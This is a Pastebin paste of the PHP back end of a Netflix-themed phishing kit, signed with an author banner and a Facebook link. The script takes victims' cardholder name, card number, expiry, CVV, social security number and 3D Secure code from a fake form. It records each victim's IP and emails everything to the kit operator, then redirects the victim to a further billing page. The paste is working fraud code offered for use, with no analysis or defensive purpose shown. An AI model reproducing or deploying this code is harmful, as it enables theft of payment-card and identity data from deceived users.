ozuma5119

Netflix Phish Kit (finish.php)

Jun 22nd, 2019
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. <?php
  2. ######################################################################################################
  3. ######################################################################################################
  4. ######################################################################################################
  5. ######################################################################################################
  6. # #
  7. # ######## ## ## ######## ## ######## ######## ######## ### ### #### #
  8. # ## ## ## ## ## # ## ## ## ## ## ### ### ## ## #
  9. # ## ## ## ## ## # ## ## ## ## ## ## ## ## ## #
  10. # ## ######## ######## ## ######## ## ## ######## ## ## ## #
  11. # ## ## ## ## ## # ## ## ## ## ### ## #
  12. # ## ## ## ## ## # ## ## ## ## # ## #
  13. # ######## ## ## ######## ######## ######## ######## ## # ###### #
  14. # \\ FB:https://www.facebook.com/chlboo9 // #
  15. ######################################################################################################
  16. ######################################################################################################
  17. ######################################################################################################
  18. ######################################################################################################
  19. ////////
  20.  
  21. session_start();
  22.  
  23. $ip = getenv("REMOTE_ADDR");
  24. $crd = $_POST['crd'];
  25.  
  26. $headers = "From: XVerginia <[email protected]>\r\n" ;
  27. $msg = "
  28. ------------NEW CVV--------------------->
  29. Name On Card : ".$_POST['nmc']."
  30. Card Number : ".$_POST['crd']."
  31. Expiry Date : ".$_POST['exm']." ".$_POST['exy']."
  32. CSC/CVV : ".$_POST['csc']."
  33. snn Code : ".$_POST['srt']."
  34. 3Dsecure : ".$_POST['nbn']."
  35. IP : $ip
  36. +=+=+=+=+=+=+=+=+=+=## XVerginia ##+=+=+=+=+=+=+=+=+=+=+=";
  37.  
  38. include 'email.php';
  39. $subj = "♥ VBV Info ♥ - $ip";
  40. $headers .= "Content-Type: text/plain; charset=UTF-8\n";
  41. $headers .= "Content-Transfer-Encoding: 8bit\n";
  42. mail("$to", $subj, $msg,"$headers");
  43. include 'hostname_check.php';
  44. header("Location: billing.php?ip=$ip");
  45. ?>
Add Comment
Please, Sign In to add comment